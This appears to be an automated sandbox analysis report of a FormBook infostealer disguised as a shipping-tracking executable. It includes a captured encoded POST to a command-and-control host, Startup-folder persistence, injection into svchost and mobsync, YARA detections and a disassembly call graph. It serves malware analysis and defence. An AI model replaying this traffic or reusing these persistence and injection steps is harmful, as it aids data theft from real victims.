                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.649976209.74.64.189802248C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 18:40:03.212359905 CET777OUTPOST /mnch/ HTTP/1.1
                                                  Host: www.martmall.info
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.martmall.info
                                                  Referer: http://www.martmall.info/mnch/
                                                  Cache-Control: no-cache
                                                  Content-Length: 210
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)
                                                  Data Raw: 52 44 75 70 47 3d 69 2b 70 41 56 70 66 31 52 64 75 46 51 32 47 43 78 64 67 6a 6f 33 41 44 4f 49 4d 65 42 30 5a 61 35 4f 35 50 6c 56 55 65 72 53 48 38 58 4c 6a 6c 47 4b 78 66 74 34 48 79 2f 37 37 4c 74 66 64 51 44 34 71 66 59 69 6f 6d 52 39 44 4f 30 47 48 4f 66 56 4a 4d 36 69 47 31 43 58 68 42 6c 68 46 48 49 56 52 30 4e 43 51 73 77 4c 6f 36 31 33 2f 68 75 4a 33 38 73 64 47 64 79 61 75 6f 51 66 61 65 67 50 2b 4b 30 4d 74 4d 74 55 52 73 52 69 59 55 6f 41 4d 47 52 37 48 74 47 34 65 4a 78 50 44 48 4e 4b 54 43 70 62 44 53 74 63 37 6d 77 47 66 53 75 71 57 68 48 49 2b 6e 6b 6d 68 30 51 73 4b 46 34 32 53 79 7a 4e 52 6b 6a 35 54 65
                                                  Data Ascii: RDupG=i+pAVpf1RduFQ2GCxdgjo3ADOIMeB0Za5O5PlVUerSH8XLjlGKxft4Hy/77LtfdQD4qfYiomR9DO0GHOfVJM6iG1CXhBlhFHIVR0NCQswLo613/huJ38sdGdyauoQfaegP+K0MtMtURsRiYUoAMGR7HtG4eJxPDHNKTCpbDStc7mwGfSuqWhHI+nkmh0QsKF42SyzNRkj5Te
                                                  Dec 17, 2024 18:40:04.454339981 CET533INHTTP/1.1 404 Not Found
                                                  Date: Tue, 17 Dec 2024 17:40:04 GMT
                                                  Server: Apache
                                                  Content-Length: 389
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:12:37:58
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0xec0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:12:37:59
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 58%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:12:38:01
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
                                                  Imagebase:0xb10000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:12:38:10
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
                                                  Imagebase:0x7ff6196c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:12:38:11
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'169'920 bytes
                                                  MD5 hash:C32B24D16816AF9ADDD23883F8B474BB
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:12:38:13
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
                                                  Imagebase:0xb10000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:12:38:44
                                                  Start date:17/12/2024
                                                  Path:C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\HAEeyFWAfjzUKobvquCaYueaFmdnYWfyjmqLTzxmyZvoEWZSUDGkRuOyUEOncRrkw\bRQIkEscRm.exe"
                                                  Imagebase:0x7c0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:10
                                                  Start time:12:38:46
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\mobsync.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                  Imagebase:0xc30000
                                                  File size:93'696 bytes
                                                  MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:12
                                                  Start time:12:39:12
                                                  Start date:17/12/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff728280000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:6.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:50
                                                    execution_graph 103356 ecb40e 103364 edf944 103356->103364 103358 ecb424 103373 ecc5a7 103358->103373 103360 ecb44c 103361 eca388 103360->103361 103385 f29e4a 89 API calls 4 library calls 103360->103385 103363 f008e9 103365 edf950 103364->103365 103366 edf962 103364->103366 103386 ec9d3c 103365->103386 103368 edf968 103366->103368 103369 edf991 103366->103369 103399 ee0db6 103368->103399 103370 ec9d3c 60 API calls 103369->103370 103372 edf95a 103370->103372 103372->103358 103444 ec7a16 103373->103444 103375 ecc5cc _wcscmp 103378 ecc600 Mailbox 103375->103378 103449 ec7de1 103375->103449 103378->103360 103382 f016ad 103383 ec9d3c 60 API calls 103382->103383 103384 f016b1 Mailbox 103382->103384 103383->103384 103384->103360 103385->103363 103387 ec9d4a 103386->103387 103397 ec9d78 Mailbox 103386->103397 103388 ec9d9d 103387->103388 103391 ec9d50 Mailbox 103387->103391 103409 ec8047 103388->103409 103390 ec9d64 103392 ec9dcc 103390->103392 103393 ec9d6f 103390->103393 103390->103397 103391->103390 103394 effa0f 103391->103394 103392->103397 103413 ec8cd4 59 API calls Mailbox 103392->103413 103395 eff9e6 VariantClear 103393->103395 103393->103397 103394->103397 103414 f16e8f 59 API calls 103394->103414 103395->103397 103397->103372 103401 ee0dbe 103399->103401 103402 ee0dd8 103401->103402 103404 ee0ddc std::exception::exception 103401->103404 103416 ee571c 103401->103416 103433 ee33a1 DecodePointer 103401->103433 103402->103372 103434 ee859b RaiseException 103404->103434 103406 ee0e06 103435 ee84d1 58 API calls _free 103406->103435 103408 ee0e18 103408->103372 103410 ec805a 103409->103410 103411 ec8052 103409->103411 103410->103397 103415 ec7f77 59 API calls 2 library calls 103411->103415 103413->103397 103414->103397 103415->103410 103417 ee5797 103416->103417 103422 ee5728 103416->103422 103442 ee33a1 DecodePointer 103417->103442 103419 ee579d 103443 ee8b28 58 API calls __getptd_noexit 103419->103443 103423 ee575b RtlAllocateHeap 103422->103423 103425 ee5733 103422->103425 103427 ee5783 103422->103427 103431 ee5781 103422->103431 103439 ee33a1 DecodePointer 103422->103439 103423->103422 103424 ee578f 103423->103424 103424->103401 103425->103422 103436 eea16b 58 API calls __NMSG_WRITE 103425->103436 103437 eea1c8 58 API calls 6 library calls 103425->103437 103438 ee309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103425->103438 103440 ee8b28 58 API calls __getptd_noexit 103427->103440 103441 ee8b28 58 API calls __getptd_noexit 103431->103441 103433->103401 103434->103406 103435->103408 103436->103425 103437->103425 103439->103422 103440->103431 103441->103424 103442->103419 103443->103424 103445 ee0db6 Mailbox 59 API calls 103444->103445 103446 ec7a3b 103445->103446 103463 ec8029 103446->103463 103450 ec7df0 __wsetenvp _memmove 103449->103450 103451 ee0db6 Mailbox 59 API calls 103450->103451 103452 ec7e2e 103451->103452 103453 ec7b2e 103452->103453 103454 efec6b 103453->103454 103455 ec7b40 103453->103455 103472 f17bdb 59 API calls _memmove 103454->103472 103466 ec7a51 103455->103466 103458 ec7b4c 103462 ec843a 68 API calls 103458->103462 103459 efec75 103460 ec8047 59 API calls 103459->103460 103461 efec7d Mailbox 103460->103461 103462->103382 103464 ee0db6 Mailbox 59 API calls 103463->103464 103465 ec7a4a 103464->103465 103465->103375 103467 ec7a5f 103466->103467 103468 ec7a85 _memmove 103466->103468 103467->103468 103469 ee0db6 Mailbox 59 API calls 103467->103469 103468->103458 103470 ec7ad4 103469->103470 103471 ee0db6 Mailbox 59 API calls 103470->103471 103471->103468 103472->103459 103473 ece4a8 103476 ecd100 103473->103476 103475 ece4b6 103477 ecd11d 103476->103477 103505 ecd37d 103476->103505 103478 f026e0 103477->103478 103479 f02691 103477->103479 103508 ecd144 103477->103508 103551 f3a3e6 340 API calls __cinit 103478->103551 103482 f02694 103479->103482 103487 f026af 103479->103487 103483 f026a0 103482->103483 103482->103508 103549 f3a9fa 340 API calls 103483->103549 103487->103505 103550 f3aea2 340 API calls 3 library calls 103487->103550 103488 ecd434 103540 ec8a52 68 API calls 103488->103540 103489 f028b5 103489->103489 103490 ecd54b 103490->103475 103494 ecd443 103494->103475 103495 f027fc 103554 f3a751 89 API calls 103495->103554 103503 ec9d3c 60 API calls 103503->103508 103505->103490 103555 f29e4a 89 API calls 4 library calls 103505->103555 103507 ec8047 59 API calls 103507->103508 103508->103488 103508->103490 103508->103495 103508->103503 103508->103505 103508->103507 103510 ec9ea0 103508->103510 103534 ec8740 68 API calls __cinit 103508->103534 103535 ec8542 68 API calls 103508->103535 103536 ec84c0 103508->103536 103541 ec843a 68 API calls 103508->103541 103542 eccf7c 340 API calls 103508->103542 103543 ec9dda 59 API calls Mailbox 103508->103543 103544 ee2d40 103508->103544 103547 eccf00 89 API calls 103508->103547 103548 eccd7d 340 API calls 103508->103548 103552 ec8a52 68 API calls 103508->103552 103553 f1678d 60 API calls 103508->103553 103511 ec9ebf 103510->103511 103522 ec9eed Mailbox 103510->103522 103512 ee0db6 Mailbox 59 API calls 103511->103512 103512->103522 103513 ee2d40 67 API calls __cinit 103513->103522 103514 ecb475 103515 ec8047 59 API calls 103514->103515 103516 eca057 103515->103516 103516->103508 103517 ecb47a 103519 f009e5 103517->103519 103520 f00055 103517->103520 103518 ee0db6 59 API calls Mailbox 103518->103522 103561 f29e4a 89 API calls 4 library calls 103519->103561 103558 f29e4a 89 API calls 4 library calls 103520->103558 103522->103513 103522->103514 103522->103516 103522->103517 103522->103518 103522->103520 103525 ec8047 59 API calls 103522->103525 103528 ec7667 59 API calls 103522->103528 103530 f16e8f 59 API calls 103522->103530 103531 f009d6 103522->103531 103533 eca55a 103522->103533 103556 ecc8c0 340 API calls 2 library calls 103522->103556 103557 ecb900 60 API calls Mailbox 103522->103557 103525->103522 103526 f00064 103526->103508 103528->103522 103530->103522 103560 f29e4a 89 API calls 4 library calls 103531->103560 103559 f29e4a 89 API calls 4 library calls 103533->103559 103534->103508 103535->103508 103537 ec84cb 103536->103537 103539 ec84f2 103537->103539 103562 ec89b3 69 API calls Mailbox 103537->103562 103539->103508 103540->103494 103541->103508 103542->103508 103543->103508 103563 ee2c44 103544->103563 103546 ee2d4b 103546->103508 103547->103508 103548->103508 103549->103490 103550->103505 103551->103508 103552->103508 103553->103508 103554->103505 103555->103489 103556->103522 103557->103522 103558->103526 103559->103516 103560->103519 103561->103516 103562->103539 103564 ee2c50 __setmbcp 103563->103564 103571 ee3217 103564->103571 103570 ee2c77 __setmbcp 103570->103546 103588 ee9c0b 103571->103588 103573 ee2c59 103574 ee2c88 DecodePointer DecodePointer 103573->103574 103575 ee2c65 103574->103575 103576 ee2cb5 103574->103576 103585 ee2c82 103575->103585 103576->103575 103634 ee87a4 59 API calls 2 library calls 103576->103634 103578 ee2d18 EncodePointer EncodePointer 103578->103575 103579 ee2cc7 103579->103578 103580 ee2cec 103579->103580 103635 ee8864 61 API calls 2 library calls 103579->103635 103580->103575 103583 ee2d06 EncodePointer 103580->103583 103636 ee8864 61 API calls 2 library calls 103580->103636 103583->103578 103584 ee2d00 103584->103575 103584->103583 103637 ee3220 103585->103637 103589 ee9c2f EnterCriticalSection 103588->103589 103590 ee9c1c 103588->103590 103589->103573 103595 ee9c93 103590->103595 103592 ee9c22 103592->103589 103619 ee30b5 58 API calls 3 library calls 103592->103619 103596 ee9c9f __setmbcp 103595->103596 103597 ee9ca8 103596->103597 103598 ee9cc0 103596->103598 103620 eea16b 58 API calls __NMSG_WRITE 103597->103620 103610 ee9ce1 __setmbcp 103598->103610 103623 ee881d 58 API calls 2 library calls 103598->103623 103601 ee9cad 103621 eea1c8 58 API calls 6 library calls 103601->103621 103602 ee9cd5 103604 ee9cdc 103602->103604 103605 ee9ceb 103602->103605 103624 ee8b28 58 API calls __getptd_noexit 103604->103624 103608 ee9c0b __lock 58 API calls 103605->103608 103606 ee9cb4 103622 ee309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103606->103622 103611 ee9cf2 103608->103611 103610->103592 103613 ee9cff 103611->103613 103614 ee9d17 103611->103614 103625 ee9e2b InitializeCriticalSectionAndSpinCount 103613->103625 103626 ee2d55 103614->103626 103617 ee9d0b 103632 ee9d33 LeaveCriticalSection _doexit 103617->103632 103620->103601 103621->103606 103623->103602 103624->103610 103625->103617 103627 ee2d5e RtlFreeHeap 103626->103627 103628 ee2d87 _free 103626->103628 103627->103628 103629 ee2d73 103627->103629 103628->103617 103633 ee8b28 58 API calls __getptd_noexit 103629->103633 103631 ee2d79 GetLastError 103631->103628 103632->103610 103633->103631 103634->103579 103635->103580 103636->103584 103640 ee9d75 LeaveCriticalSection 103637->103640 103639 ee2c87 103639->103570 103640->103639 103641 ec552a 103648 ec5ab8 103641->103648 103647 ec555a Mailbox 103649 ee0db6 Mailbox 59 API calls 103648->103649 103650 ec5acb 103649->103650 103651 ee0db6 Mailbox 59 API calls 103650->103651 103652 ec553c 103651->103652 103653 ec54d2 103652->103653 103660 ec58cf 103653->103660 103656 ec5514 103656->103647 103659 ec8061 61 API calls Mailbox 103656->103659 103658 ec54e3 103658->103656 103667 ec5bc0 103658->103667 103673 ec5a7a 103658->103673 103659->103647 103661 efdc3c 103660->103661 103662 ec58e0 103660->103662 103682 f15ecd 59 API calls Mailbox 103661->103682 103662->103658 103664 efdc46 103665 ee0db6 Mailbox 59 API calls 103664->103665 103666 efdc52 103665->103666 103668 ec5c33 103667->103668 103672 ec5bce 103667->103672 103683 ec5c4e SetFilePointerEx 103668->103683 103669 ec5bf6 103669->103658 103671 ec5c06 ReadFile 103671->103669 103671->103672 103672->103669 103672->103671 103674 efdcee 103673->103674 103675 ec5a8e 103673->103675 103689 f15ecd 59 API calls Mailbox 103674->103689 103684 ec59b9 103675->103684 103678 ec5a9a 103678->103658 103679 efdcf9 103680 ee0db6 Mailbox 59 API calls 103679->103680 103681 efdd0e _memmove 103680->103681 103682->103664 103683->103672 103685 ec59d1 103684->103685 103687 ec59ca _memmove 103684->103687 103686 ee0db6 Mailbox 59 API calls 103685->103686 103688 efdc7e 103685->103688 103686->103687 103687->103678 103688->103688 103689->103679 103690 ece5ab 103691 ecd100 340 API calls 103690->103691 103692 ece5b9 103691->103692 103693 effe27 103694 edf944 60 API calls 103693->103694 103695 effe3d 103694->103695 103696 effebe 103695->103696 103697 effe53 103695->103697 103706 ecfce0 103696->103706 103786 ec9e5d 60 API calls 103697->103786 103699 effe92 103701 effe9a 103699->103701 103702 f0089c 103699->103702 103787 f2834f 59 API calls Mailbox 103701->103787 103788 f29e4a 89 API calls 4 library calls 103702->103788 103705 effeb2 Mailbox 103705->103705 103789 ec8180 103706->103789 103708 ecfd3d 103709 ed06f6 103708->103709 103710 f0472d 103708->103710 103794 ecf234 103708->103794 103900 f29e4a 89 API calls 4 library calls 103709->103900 103901 f29e4a 89 API calls 4 library calls 103710->103901 103714 f04742 103715 f0488d 103715->103714 103720 ecfe4c 103715->103720 103907 f3a2d9 85 API calls Mailbox 103715->103907 103716 ecfe3e 103716->103715 103716->103720 103905 f166ec 59 API calls 2 library calls 103716->103905 103717 ed0517 103725 ee0db6 Mailbox 59 API calls 103717->103725 103719 f047d7 103719->103714 103903 f29e4a 89 API calls 4 library calls 103719->103903 103726 f048f9 103720->103726 103774 f04b53 103720->103774 103798 ec837c 103720->103798 103722 f04848 103906 f160ef 59 API calls 2 library calls 103722->103906 103735 ed0545 _memmove 103725->103735 103736 f04917 103726->103736 103909 ec85c0 103726->103909 103729 f04755 103729->103719 103902 ecf6a3 340 API calls 103729->103902 103731 ecfea4 103742 f04ad6 103731->103742 103743 ecff32 103731->103743 103779 ed0179 Mailbox _memmove 103731->103779 103732 f0486b 103739 ec9ea0 340 API calls 103732->103739 103733 f048b2 Mailbox 103733->103720 103908 f166ec 59 API calls 2 library calls 103733->103908 103744 ee0db6 Mailbox 59 API calls 103735->103744 103738 f04928 103736->103738 103741 ec85c0 59 API calls 103736->103741 103738->103779 103917 f160ab 59 API calls Mailbox 103738->103917 103739->103715 103740 ee0db6 59 API calls Mailbox 103749 ecfdd3 103740->103749 103741->103738 103921 f29ae7 60 API calls 103742->103921 103746 ee0db6 Mailbox 59 API calls 103743->103746 103769 ed0106 _memmove 103744->103769 103751 ecff39 103746->103751 103749->103714 103749->103716 103749->103717 103749->103729 103749->103735 103749->103740 103750 ec9ea0 340 API calls 103749->103750 103758 f0480c 103749->103758 103750->103749 103751->103709 103805 ed09d0 103751->103805 103752 f04a4d 103753 ec9ea0 340 API calls 103752->103753 103755 f04a87 103753->103755 103755->103714 103760 ec84c0 69 API calls 103755->103760 103756 ecffb2 103756->103709 103756->103735 103764 ecffe6 103756->103764 103904 f29e4a 89 API calls 4 library calls 103758->103904 103763 f04ab2 103760->103763 103920 f29e4a 89 API calls 4 library calls 103763->103920 103767 ec8047 59 API calls 103764->103767 103772 ed0007 103764->103772 103766 ec9d3c 60 API calls 103766->103779 103767->103772 103769->103779 103785 ed0162 103769->103785 103895 ec9c90 103769->103895 103770 ed0398 103770->103705 103771 ee0db6 59 API calls Mailbox 103771->103779 103772->103709 103773 f04b24 103772->103773 103777 ed004c 103772->103777 103775 ec9d3c 60 API calls 103773->103775 103774->103714 103922 f29e4a 89 API calls 4 library calls 103774->103922 103775->103774 103776 ed00d8 103778 ec9d3c 60 API calls 103776->103778 103777->103709 103777->103774 103777->103776 103781 ed00eb 103778->103781 103779->103709 103779->103752 103779->103763 103779->103766 103779->103770 103779->103771 103780 f04a1c 103779->103780 103893 ec8740 68 API calls __cinit 103779->103893 103894 ec8660 68 API calls 103779->103894 103918 f25937 68 API calls 103779->103918 103919 ec89b3 69 API calls Mailbox 103779->103919 103783 ee0db6 Mailbox 59 API calls 103780->103783 103781->103709 103882 ec82df 103781->103882 103783->103752 103785->103705 103786->103699 103787->103705 103788->103705 103790 ec818f 103789->103790 103793 ec81aa 103789->103793 103923 ec7e4f 103790->103923 103792 ec8197 CharUpperBuffW 103792->103793 103793->103708 103795 ecf251 103794->103795 103796 ecf272 103795->103796 103927 f29e4a 89 API calls 4 library calls 103795->103927 103796->103749 103799 ec838d 103798->103799 103800 efedbd 103798->103800 103801 ee0db6 Mailbox 59 API calls 103799->103801 103802 ec8394 103801->103802 103803 ec83b5 103802->103803 103928 ec8634 59 API calls Mailbox 103802->103928 103803->103726 103803->103731 103806 f04cc3 103805->103806 103820 ed09f5 103805->103820 103989 f29e4a 89 API calls 4 library calls 103806->103989 103808 ed0cfa 103808->103756 103810 ed0ee4 103810->103808 103812 ed0ef1 103810->103812 103987 ed1093 340 API calls Mailbox 103812->103987 103813 ed0a4b PeekMessageW 103881 ed0a05 Mailbox 103813->103881 103815 ed0ef8 LockWindowUpdate DestroyWindow GetMessageW 103815->103808 103818 ed0f2a 103815->103818 103817 f04e81 Sleep 103817->103881 103821 f05c58 TranslateMessage DispatchMessageW GetMessageW 103818->103821 103819 ed0ce4 103819->103808 103986 ed1070 10 API calls Mailbox 103819->103986 103820->103881 103990 ec9e5d 60 API calls 103820->103990 103991 f16349 340 API calls 103820->103991 103821->103821 103823 f05c88 103821->103823 103823->103808 103824 ed0ea5 TranslateMessage DispatchMessageW 103825 ed0e43 PeekMessageW 103824->103825 103825->103881 103826 f04d50 TranslateAcceleratorW 103826->103825 103826->103881 103827 ee0db6 59 API calls Mailbox 103827->103881 103828 ed0d13 timeGetTime 103828->103881 103829 f0581f WaitForSingleObject 103831 f0583c GetExitCodeProcess CloseHandle 103829->103831 103829->103881 103865 ed0f95 103831->103865 103832 ed0e5f Sleep 103867 ed0e70 Mailbox 103832->103867 103833 ec8047 59 API calls 103833->103881 103835 f05af8 Sleep 103835->103867 103837 ecb73c 313 API calls 103837->103881 103839 ee049f timeGetTime 103839->103867 103840 ed0f4e timeGetTime 103988 ec9e5d 60 API calls 103840->103988 103844 f05b8f GetExitCodeProcess 103849 f05ba5 WaitForSingleObject 103844->103849 103850 f05bbb CloseHandle 103844->103850 103847 f45f25 110 API calls 103847->103867 103848 ecb7dd 109 API calls 103848->103867 103849->103850 103849->103881 103850->103867 103851 f05874 103851->103865 103852 f05c17 Sleep 103852->103881 103853 f05078 Sleep 103853->103881 103855 ec7de1 59 API calls 103855->103867 103858 ec9e5d 60 API calls 103858->103881 103861 ec9ea0 313 API calls 103861->103881 103862 ecfce0 313 API calls 103862->103881 103865->103756 103867->103839 103867->103844 103867->103847 103867->103848 103867->103851 103867->103852 103867->103853 